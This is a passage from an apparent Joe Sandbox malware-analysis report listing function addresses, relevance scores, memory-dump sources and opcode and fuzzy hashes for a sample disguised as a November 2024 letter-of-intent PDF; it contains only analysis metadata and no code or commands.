                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 83759e7c585e4e91f719a5750e2c551a0d0c230c4acde3f16e78068ef284c3ac
                                                                                      • Instruction ID: 9c6a8bbf1988ff085d1516ddeb278ba9a48daf7cd901f11e7eab1ae0debce37c
                                                                                      • Opcode Fuzzy Hash: 83759e7c585e4e91f719a5750e2c551a0d0c230c4acde3f16e78068ef284c3ac
                                                                                      • Instruction Fuzzy Hash: 6A42A375A00616CFDB0ACF59C4906AEB7B2FF88354F14895DDA52AB350DB34E942CF90
                                                                                      Function 32FBB2C0 Relevance: .6, Instructions: 629COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 338caac8d66953617f7d08349e6cb561e1f31e9ff30218e74c36759bbe8f5852
                                                                                      • Instruction ID: 8d6318598c1c4508b0bb3385656e60fe059854b80dd1540ab3d0d77253c6a786
                                                                                      • Opcode Fuzzy Hash: 338caac8d66953617f7d08349e6cb561e1f31e9ff30218e74c36759bbe8f5852
                                                                                      • Instruction Fuzzy Hash: B932B2B6E00219DBDF14CFA9D850BAEBBB1FF54718F180469ED05AB390EB759901CB90
                                                                                      Function 330516CC Relevance: .6, Instructions: 571COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5fdf94b565c6c175db56fa1bdd65d19f6becb15901f93aae16645724946482ba
                                                                                      • Instruction ID: 73a541d9016f8bce5f6f52f209037d921548d66152b8a336086b87131fded53e
                                                                                      • Opcode Fuzzy Hash: 5fdf94b565c6c175db56fa1bdd65d19f6becb15901f93aae16645724946482ba
                                                                                      • Instruction Fuzzy Hash: BE22A279A042168FEF0DCF58C490AAEB7F6BF88314F5845ADE9519B340DB30E942CB90
                                                                                      Function 32F9D7E0 Relevance: .3, Instructions: 342COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ef10dbb792d4c250e7d871d83bccde37ec217903a40a35bdb4f75661d355f0a1
                                                                                      • Instruction ID: e0911ca433852ee69d9b49811e75c9af04f65f2d7e2caf95b7f0dc43e70214bd
                                                                                      • Opcode Fuzzy Hash: ef10dbb792d4c250e7d871d83bccde37ec217903a40a35bdb4f75661d355f0a1
                                                                                      • Instruction Fuzzy Hash: B8C10375E0460AABFB08DF58C840B9EB7B1FF54754F208A69DB14BB291DB71E841CB90
                                                                                      Function 32FAF460 Relevance: .3, Instructions: 321COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ae43a0d322521fa50ec4bc3d7661e3a527201b511a7080eb3bd5e2087331ddf3
                                                                                      • Instruction ID: d56ae0a3bf61eba55a45f29248301e2ea41fef0d3b72c5da494f39cf4be0b379
                                                                                      • Opcode Fuzzy Hash: ae43a0d322521fa50ec4bc3d7661e3a527201b511a7080eb3bd5e2087331ddf3
                                                                                      • Instruction Fuzzy Hash: 4EC104B6A013158FEB14CF18C5A0769B7E1FF44748F554A59EE829F3A1EB318942CFA0
                                                                                      Function 32FB90DB Relevance: .3, Instructions: 287COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1d689545323c3809242a89b302a441723cb7699d350303314009a2c8d3cdd3b3
                                                                                      • Instruction ID: 9f93292debade297d969343d9c63b436ff493d1cd6580dcbde5bd4b161848d53
                                                                                      • Opcode Fuzzy Hash: 1d689545323c3809242a89b302a441723cb7699d350303314009a2c8d3cdd3b3
                                                                                      • Instruction Fuzzy Hash: 5CA129B2900215AFEB129FA4CC91FAE77B9AF45754F450954FA00AB2A0DBB5DC50CFA0
                                                                                      Function 3303B550 Relevance: .3, Instructions: 263COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3ff7ac1fed8eb685f2fac3ffbc1061d77b3cb113fc48d4405aa9a5c461cbf6ec
                                                                                      • Instruction ID: 8ef727e54d8afbd61cee5155f9cf669f27336c64e429fba1bb67f30a9b879a5f
                                                                                      • Opcode Fuzzy Hash: 3ff7ac1fed8eb685f2fac3ffbc1061d77b3cb113fc48d4405aa9a5c461cbf6ec
                                                                                      • Instruction Fuzzy Hash: 11A16975601605DFD714CF19C580A1AF7FAFF8A368B2885AED14A8B761E770E941CB80
                                                                                      Function 32F99486 Relevance: .3, Instructions: 259COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 595d37b8f0615dbdb30c9c9d07b640900b829efeb8792c01ed12cca17ade66a7
                                                                                      • Instruction ID: 8171a793bb032543c4fc4496864ea9bcf0a547ec8833f19decff54f4d6d61516
                                                                                      • Opcode Fuzzy Hash: 595d37b8f0615dbdb30c9c9d07b640900b829efeb8792c01ed12cca17ade66a7
                                                                                      • Instruction Fuzzy Hash: FDB12AB9A003058FEB15DF18C5807EA77E0BF48358F52495EDA259B392EB75D882CF90
                                                                                      Function 3304B52F Relevance: .2, Instructions: 222COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
                                                                                      • Instruction ID: 3d1a75f95a385f9880ac788b31dc826a0f035ec33633bb5df7a603d78ffcb26b
                                                                                      • Opcode Fuzzy Hash: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
                                                                                      • Instruction Fuzzy Hash: 5D71A379A0021A9BDB10DF64C680AAFB7F9AF44790F5845AADC80AB341E735DA41CF90
                                                                                      Function 32FBD090 Relevance: .2, Instructions: 217COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                                                                      • Instruction ID: b75d6481fa19680d95d1e3204d77923097a4dd0282459e5f9c1f2cee65d730b8
                                                                                      • Opcode Fuzzy Hash: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                                                                      • Instruction Fuzzy Hash: 2281C076E012159BEF04CF68C880B9DB7B2FF88748F15896ACA16B7350DB329900CBD1
                                                                                      Function 33059B8B Relevance: .2, Instructions: 210COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5fe8854b4620f6318d27f6552bee41dbaefa2de372a64b9f4495ca038aa976c2
                                                                                      • Instruction ID: 3dc87dd0e6ca7ad60447d30511b144a4f341b5b461f89fff9dcefca5be4cded4
                                                                                      • Opcode Fuzzy Hash: 5fe8854b4620f6318d27f6552bee41dbaefa2de372a64b9f4495ca038aa976c2
                                                                                      • Instruction Fuzzy Hash: BF61C574F042199BFB04CB64C980BBE7BEAAF85350F584595F891A7280DB34CD41C7A0
                                                                                      Function 3303375F Relevance: .2, Instructions: 201COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 82c7f8e0a8dcea43614b796d12c53402bcb8da912068ad0ad046bdd6cdcdd85c
                                                                                      • Instruction ID: 4d7bf786eb24df8ec2fae818d3fd88cd053398d75d615becbe89ff4c96d00f7a
                                                                                      • Opcode Fuzzy Hash: 82c7f8e0a8dcea43614b796d12c53402bcb8da912068ad0ad046bdd6cdcdd85c
                                                                                      • Instruction Fuzzy Hash: 57718175E01614EFDB11DFA8D980BADB7B5FF4A760F584096E940AB260D731DC42CB90
                                                                                      Function 3305903E Relevance: .2, Instructions: 186COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 88543d880cf0bddb032e5d347ab37798a1375b77e81bd407e1bfbf94bc679ced
                                                                                      • Instruction ID: 0e93b1248a7f83a64579fb78e5be4af4adf3243b39f0ec72c821f076fe48432f
                                                                                      • Opcode Fuzzy Hash: 88543d880cf0bddb032e5d347ab37798a1375b77e81bd407e1bfbf94bc679ced
                                                                                      • Instruction Fuzzy Hash: EB61C1B5608715AFE715CF64C980BABBBE9FF88350F004A99F89987640DB30E514CB91
                                                                                      Function 330592A6 Relevance: .2, Instructions: 174COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6daa6cf14511328bf7f953b21a63e5516d5c8402d99b712c5d3b181ee93fcea6
                                                                                      • Instruction ID: 8c69c7cd35501834dca7ac11f3ae8a8488cdfceaf5ab89d93991d47e81cedfe7
                                                                                      • Opcode Fuzzy Hash: 6daa6cf14511328bf7f953b21a63e5516d5c8402d99b712c5d3b181ee93fcea6
                                                                                      • Instruction Fuzzy Hash: DF61BCB5608742CBF701CF64C994B6AB7E4BF90704F1848ACF8D58B691EB75E806CB81
                                                                                      Function 32FC9B9F Relevance: .2, Instructions: 165COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e5824e76c76bdc07e97dd2f288207f70570a2a81a8a346579a7de1ee7ce71bad
                                                                                      • Instruction ID: 0737d8669de6e3b67efaf9b25e86de26c431a654efbabec283941663e2559503
                                                                                      • Opcode Fuzzy Hash: e5824e76c76bdc07e97dd2f288207f70570a2a81a8a346579a7de1ee7ce71bad
                                                                                      • Instruction Fuzzy Hash: 9C6167B5E0172A9FEB05CF68C540BADBBF1FF48724F04856AE959AB251C774A900CF90
                                                                                      Function 32F8B2D3 Relevance: .2, Instructions: 161COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8449899d70f11b915d7e53a4bf95409c51a298d45c5e1fe11413a26acb6ef3cc
                                                                                      • Instruction ID: a826e78d1fd1280b9f1183953bd70182de475ada4e48c8120dfaf50c43a94a8b
                                                                                      • Opcode Fuzzy Hash: 8449899d70f11b915d7e53a4bf95409c51a298d45c5e1fe11413a26acb6ef3cc
                                                                                      • Instruction Fuzzy Hash: 04413371600700DFE7169F29CD91B1AB7A9EF44764F114C2AEB69DB350DB70E841CB90
                                                                                      Function 3300D5D0 Relevance: .2, Instructions: 161COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 421d61e5bc4c825cfb3b344d513b1230fd482de7481e25e13c6dc44851e8f620
                                                                                      • Instruction ID: 7584cd59f9409ee35c74e382319135229b187b1b0cfa1cb200658fda4f73fa32
                                                                                      • Opcode Fuzzy Hash: 421d61e5bc4c825cfb3b344d513b1230fd482de7481e25e13c6dc44851e8f620
                                                                                      • Instruction Fuzzy Hash: 7851D6BA6003129BEB00AF649C40A6F77E5EF84780F440869FA58C7250FB75C856DFB2
                                                                                      Function 32FCB570 Relevance: .2, Instructions: 161COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9fb330093625ff51e6387d915807d50d7a57e5f20ba583768f950ab39667d23f
                                                                                      • Instruction ID: c6fa8cda80181cb8aefdbe9f0d97cf48d616a15f546fc3c01e80f1c77597b57a
                                                                                      • Opcode Fuzzy Hash: 9fb330093625ff51e6387d915807d50d7a57e5f20ba583768f950ab39667d23f
                                                                                      • Instruction Fuzzy Hash: 5151EFB15003409FF720EF69C880F5A77E8EF85B64F140A2DFA519B291DB74D841CBA6
                                                                                      Function 32FB95DA Relevance: .2, Instructions: 160COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 18429f8e42bd28199a82acb85bbb404d7ccf2cc51b85b4703a20eefdcdc48c83
                                                                                      • Instruction ID: 02c0b96eb03669367c755ef52c8aec19cf94f5dcfb5120a5a9b776a194c3c031
                                                                                      • Opcode Fuzzy Hash: 18429f8e42bd28199a82acb85bbb404d7ccf2cc51b85b4703a20eefdcdc48c83
                                                                                      • Instruction Fuzzy Hash: A7516E71A00348AFEB218FB5CC81BDDBBB5FF05344F60492AEA94A7191DBB29844DF50
                                                                                      Function 32FA3740 Relevance: .2, Instructions: 159COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ef8e8214e1d9eeff2733bb0c5cd325350ff655c983a9c31f7d7e3a674df12fdc
                                                                                      • Instruction ID: d2ecf2b0722d139ede7d3bdd80e8877840f3e2c7c04dc2aefc2bd61a2ac34372
                                                                                      • Opcode Fuzzy Hash: ef8e8214e1d9eeff2733bb0c5cd325350ff655c983a9c31f7d7e3a674df12fdc
                                                                                      • Instruction Fuzzy Hash: CA51DF7AA04656AFD311CF68C8A0B69B7B0FF04710B018AA9ED44DB740EB35E991CBD0
                                                                                      Function 3305D26B Relevance: .2, Instructions: 153COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e34a641792a2e79be6bf0067dfbea21fe876c0422c27924c31e583a14ba6783b
                                                                                      • Instruction ID: 3be4d33fc4589f0849f39322b3581b591f94e06460335f432beff0ae2267d34d
                                                                                      • Opcode Fuzzy Hash: e34a641792a2e79be6bf0067dfbea21fe876c0422c27924c31e583a14ba6783b
                                                                                      • Instruction Fuzzy Hash: 88515C766083429FE700CF68C884B5ABBE6FFC8344F04896EF9A49B240D774E945CB52
                                                                                      Function 33023140 Relevance: .1, Instructions: 149COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3fc41b4a57b3ae211b429f0ce6200384c45e654781a1b4c516da98ad60127a41
                                                                                      • Instruction ID: 7cc8d6543ffb5684587b69ae95e1976873845b9871f919a7c38bfb739502e4ea
                                                                                      • Opcode Fuzzy Hash: 3fc41b4a57b3ae211b429f0ce6200384c45e654781a1b4c516da98ad60127a41
                                                                                      • Instruction Fuzzy Hash: 4151BC76604301DFE711CF28C880B5ABBE5FF88354F0589AAF994DB250D774E949CB92
                                                                                      Function 32F951ED Relevance: .1, Instructions: 149COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
